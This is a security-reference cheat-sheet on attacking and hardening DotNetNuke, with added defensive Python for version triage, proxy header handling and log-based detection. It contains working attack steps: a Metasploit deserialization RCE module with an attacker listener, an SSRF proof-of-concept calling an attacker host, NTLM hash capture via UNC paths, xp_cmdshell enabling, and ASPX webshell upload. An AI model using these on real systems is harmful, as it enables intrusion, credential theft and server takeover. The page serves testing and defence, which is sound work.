DotNetNuke (DNN)


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks


Once you are logged in as administrator, obtaining RCE in DNN is easy; however, a number of unauthenticated and post-authentication techniques have also been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.


Version & Environment Enumeration

  • Check the X-DNN HTTP response header – it usually discloses the exact platform version.
  • The installation wizard leaks the version in /Install/Install.aspx?mode=install (accessible on very old installs).
  • /API/PersonaBar/GetStatus (9.x) returns a JSON blob containing "dnnVersion" for low-privilege users.
  • Typical cookies you will see on a live instance:
    • .DOTNETNUKE – ASP.NET forms authentication ticket.
    • DNNPersonalization – contains XML/serialized user profile data (old versions – see RCE below).
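The enumeration sources above feed naturally into a version-triage step: given the disclosed version, which of the advisories covered on this page still apply? The following Python is an added example (not DNN code and not from HackTricks) that parses the version out of an `X-DNN` header or a `/API/PersonaBar/GetStatus` body and compares it with the fix levels stated in the "Affected versions" lines on this page. The exact header value format and the sample responses are constructed assumptions; the fix levels come from the page.

```python
"""Triage a DNN instance's disclosed version against the fix levels listed on this page."""
import json
import re

# First fixed version per issue, taken from the page's "Affected versions" lines.
# A build is treated as affected when it is below this version, or equal to it but
# carrying a pre-release suffix (the page lists "<= 9.3.0-RC" for the cookie issue).
FIXED_IN = {
    "DNNPersonalization cookie deserialization (CVE-2018-15811/15812/18325/18326)": (9, 3, 0),
    "RemoteContentProxy SSRF bypass (CVE-2025-32372)": (9, 13, 8),
    "UNC redirect / NTLM hash exposure (CVE-2025-52488)": (10, 0, 1),
    "Host/IP filter bypass via X-Forwarded-For (CVE-2025-52487)": (10, 0, 1),
}

# major.minor.patch with an optional alphabetic pre-release suffix such as "-RC".
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:[-.]([A-Za-z][A-Za-z0-9]*))?")


def parse_dnn_version(text):
    """Return ((major, minor, patch), is_prerelease), or None if no version is present."""
    m = _VERSION_RE.search(text or "")
    if not m:
        return None
    core = tuple(int(x) for x in m.group(1, 2, 3))
    return core, m.group(4) is not None


def version_from_headers(headers):
    """Read the version from the X-DNN response header (case-insensitive name lookup)."""
    for name, value in headers.items():
        if name.lower() == "x-dnn":
            return parse_dnn_version(value)
    return None


def version_from_personabar(body):
    """Read dnnVersion from a /API/PersonaBar/GetStatus JSON body."""
    try:
        return parse_dnn_version(str(json.loads(body).get("dnnVersion", "")))
    except (ValueError, AttributeError):
        return None


def outstanding_advisories(version):
    """List the page's advisories that still apply to the given parsed version."""
    core, prerelease = version
    return [name for name, fixed in FIXED_IN.items()
            if core < fixed or (core == fixed and prerelease)]


def triage(headers, status_body=None):
    """Prefer the header; fall back to the PersonaBar body. Returns (version, advisories)."""
    version = version_from_headers(headers) or version_from_personabar(status_body or "")
    if version is None:
        return None, []
    return version, outstanding_advisories(version)


if __name__ == "__main__":
    # Constructed sample responses; the header value format is an assumption.
    sample_headers = {"Server": "Microsoft-IIS/10.0", "X-DNN": "9.10.2"}
    sample_status = '{"dnnVersion": "9.13.7", "isHost": false}'
    version, advisories = triage(sample_headers, sample_status)
    print("version:", version)
    for name in advisories:
        print("  still affected:", name)
```

The comparison deliberately treats a pre-release build of the fixing version as still affected, which matches the page's "≤ 9.3.0-RC" wording; adjust `FIXED_IN` if the vendor advisory you work from states different fix levels.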

Unauthenticated Exploitation

1. DNNPersonalization Cookie Deserialization (RCE)

Affected versions ≤ 9.3.0-RC

DNNPersonalization is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution.

```
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run
```

The module automatically chooses the right path for patched but still vulnerable versions (CVE-2018-15811/15812/18325/18326). Exploitation works without authentication on 7.x–9.1.x and with a verified low-privilege account on 9.2.x+.

2. Server-Side Request Forgery (CVE-2025-32372)

Affected versions < 9.13.8 – Patch released April 2025

A bypass of the older DnnImageHandler fix enables an attacker to coerce the server to issue arbitrary GET requests (semi-blind SSRF). Practical impacts:

  • Internal port scan / metadata service discovery in cloud deployments.
  • Reach hosts otherwise firewalled from the Internet.

Proof-of-concept (replace TARGET & ATTACKER):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

The request is triggered in the background; monitor your listener for callbacks.

3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)

Affected versions 6.0.0 – 9.x (< 10.0.1)

Specially crafted content can make DNN attempt to fetch a resource using a UNC path such as \\attacker\share\img.png. Windows will happily perform NTLM negotiation, leaking the server-account hashes to the attacker. Upgrade to 10.0.1 or disable outbound SMB at the firewall.

4. IP Filter Bypass (CVE-2025-52487)

If administrators rely on Host/IP Filters for admin portal protection, be aware that versions prior to 10.0.1 can be bypassed by manipulating X-Forwarded-For in a reverse-proxy scenario.
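The practical defence for this class of bypass is the one the hardening list below recommends: decide the client address at the edge, and in any application-side check only trust X-Forwarded-For when the TCP peer is one of your own proxies. The following Python is an added example (not DNN's code) of a small client-IP resolver, with the weak pattern next to the hardened one; the proxy and allowlist ranges are constructed.

```python
"""Client-IP resolution behind a reverse proxy: the weak pattern beside the hardened one."""
import ipaddress

# Constructed ranges for the example: the edge proxies we operate, and the admin allowlist.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
ADMIN_ALLOWLIST = [ipaddress.ip_network("192.0.2.0/24")]


def _in_any(addr, nets):
    return any(addr in net for net in nets)


def naive_client_ip(remote_addr, xff):
    """Weak: believes X-Forwarded-For from anyone, so a direct client can forge it."""
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def hardened_client_ip(remote_addr, xff, trusted=TRUSTED_PROXIES):
    """Honour X-Forwarded-For only when the TCP peer is one of our proxies, and take the
    right-most hop that is not a trusted proxy: that is the address our proxy appended."""
    peer = ipaddress.ip_address(remote_addr)
    if not xff or not _in_any(peer, trusted):
        return str(peer)
    for hop in reversed([h.strip() for h in xff.split(",") if h.strip()]):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)  # malformed header: fall back to the socket peer
        if not _in_any(ip, trusted):
            return str(ip)
    return str(peer)  # every hop was one of ours; treat it as an internal request


def admin_allowed(client_ip, allowlist=ADMIN_ALLOWLIST):
    """Host/IP filter check against the allowlist."""
    return _in_any(ipaddress.ip_address(client_ip), allowlist)


if __name__ == "__main__":
    # Direct connection from outside with a forged header.
    forged = ("203.0.113.9", "192.0.2.10")
    print("naive   :", admin_allowed(naive_client_ip(*forged)))      # True  (bypass)
    print("hardened:", admin_allowed(hardened_client_ip(*forged)))   # False
    # Same forged header, but arriving through our proxy, which appends the real peer.
    via_proxy = ("10.1.1.5", "192.0.2.10, 203.0.113.9")
    print("hardened via proxy:", admin_allowed(hardened_client_ip(*via_proxy)))  # False
```

Walking the header from the right rather than taking the first entry is what defeats the forgery: a proxy appends the address it actually saw, so anything the client placed to the left of it is untrusted input.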


Post-Authentication to RCE

Via SQL console

Under Settings → SQL a built-in query window allows execution against the site database. On Microsoft SQL Server you can enable xp_cmdshell and spawn commands:

```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';
```

Via ASPX webshell upload

  1. Go to Settings → Security → More → More Security Settings.
  2. Append aspx (or asp) to Allowable File Extensions and Save.
  3. Browse to /admin/file-management and upload shell.aspx.
  4. Trigger it at /Portals/0/shell.aspx.
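Both the SSRF section above and this upload flow leave a clear footprint in the IIS logs: requests to `/API/RemoteContentProxy` whose `url` parameter points at internal or unknown hosts, writes through `/admin/file-management`, and script files being served from under `/Portals/`. The following Python is an added example (not DNN's code and not from HackTricks) of a detection sweep over IIS W3C extended logs that flags all three. The log lines, field layout and allowlist are constructed; the endpoint paths and file locations are the ones named on this page.

```python
"""Detection sweep over IIS W3C logs for the DNN abuse patterns described on this page."""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Address space the content proxy should never be asked to fetch from.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

# Hosts the proxy endpoint is legitimately expected to fetch (constructed allowlist).
PROXY_ALLOWLIST = {"cdn.example.com"}

# Constructed sample in IIS W3C extended format; not real traffic.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-06-01 10:00:01 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.7 Mozilla/5.0 200
2025-06-01 10:00:05 10.0.0.5 GET /API/RemoteContentProxy url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F 443 - 198.51.100.7 curl/8.0 200
2025-06-01 10:00:06 10.0.0.5 GET /API/RemoteContentProxy url=http%3A%2F%2Flistener.example%3A8080%2Fpoc 443 - 198.51.100.7 curl/8.0 200
2025-06-01 10:00:07 10.0.0.5 GET /API/RemoteContentProxy url=https%3A%2F%2Fcdn.example.com%2Flogo.png 443 - 198.51.100.7 Mozilla/5.0 200
2025-06-01 10:02:10 10.0.0.5 POST /admin/file-management - 443 admin 198.51.100.7 Mozilla/5.0 200
2025-06-01 10:02:30 10.0.0.5 GET /Portals/0/shell.aspx - 443 - 198.51.100.7 Mozilla/5.0 200
"""


def parse_iis_log(text):
    """Turn a W3C log into dicts keyed by the names in the #Fields directive."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed row; skip rather than misalign columns
        rows.append(dict(zip(fields, parts)))
    return rows


def classify_proxy_target(url):
    """'internal' for loopback/link-local/RFC1918 targets, 'allowed' for the allowlist,
    'external-unlisted' for everything else."""
    host = (urlsplit(url).hostname or "").lower()
    if host in ("", "localhost"):
        return "internal"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None and any(ip in net for net in INTERNAL_NETS):
        return "internal"
    if host in PROXY_ALLOWLIST:
        return "allowed"
    return "external-unlisted"


def sweep(rows):
    """Return (timestamp, client_ip, rule, detail) tuples for suspicious rows."""
    findings = []
    for r in rows:
        stem = r["cs-uri-stem"].lower()
        query = "" if r["cs-uri-query"] == "-" else r["cs-uri-query"]
        when = f'{r["date"]} {r["time"]}'
        if stem == "/api/remotecontentproxy":
            for target in parse_qs(query).get("url", []):
                verdict = classify_proxy_target(target)
                if verdict != "allowed":
                    findings.append((when, r["c-ip"], f"ssrf-{verdict}", target))
        if stem == "/admin/file-management" and r["cs-method"].upper() == "POST":
            findings.append((when, r["c-ip"], "file-management-write", r.get("cs-username", "-")))
        if stem.startswith("/portals/") and stem.endswith((".aspx", ".asp")):
            findings.append((when, r["c-ip"], "script-under-portals", r["cs-uri-stem"]))
    return findings


if __name__ == "__main__":
    for finding in sweep(parse_iis_log(SAMPLE_LOG)):
        print(*finding)
```

The `file-management-write` rule is noisy on its own (administrators upload files), so correlate it with a later `script-under-portals` hit from the same client within a short window; the `ssrf-internal` rule, by contrast, is high-signal and should also be paired with the egress block on `/API/RemoteContentProxy` from the hardening list.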

Privilege Escalation on Windows

Once code execution is achieved as IIS AppPool\<Site>, common Windows privilege-escalation techniques apply. If the box is vulnerable you can leverage:

  • PrintSpoofer / SpoolFool to abuse SeImpersonatePrivilege.
  • Juicy/Sharp Potatoes to escape Service Accounts.

Hardening Recommendations (Blue Team)

  • Upgrade to at least 9.13.9 (fixes SSRF bypass) or preferably 10.0.1 (IP filter & NTLM issues).
  • Remove residual InstallWizard.aspx* files after installation.
  • Disable outbound SMB (ports 445/139) egress.
  • Enforce strong Host Filters on the edge proxy rather than within DNN.
  • Block access to /API/RemoteContentProxy if unused.

References

  • Metasploit dnn_cookie_deserialization_rce module documentation – practical unauthenticated RCE details (GitHub).
  • GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF bypass & patch information.
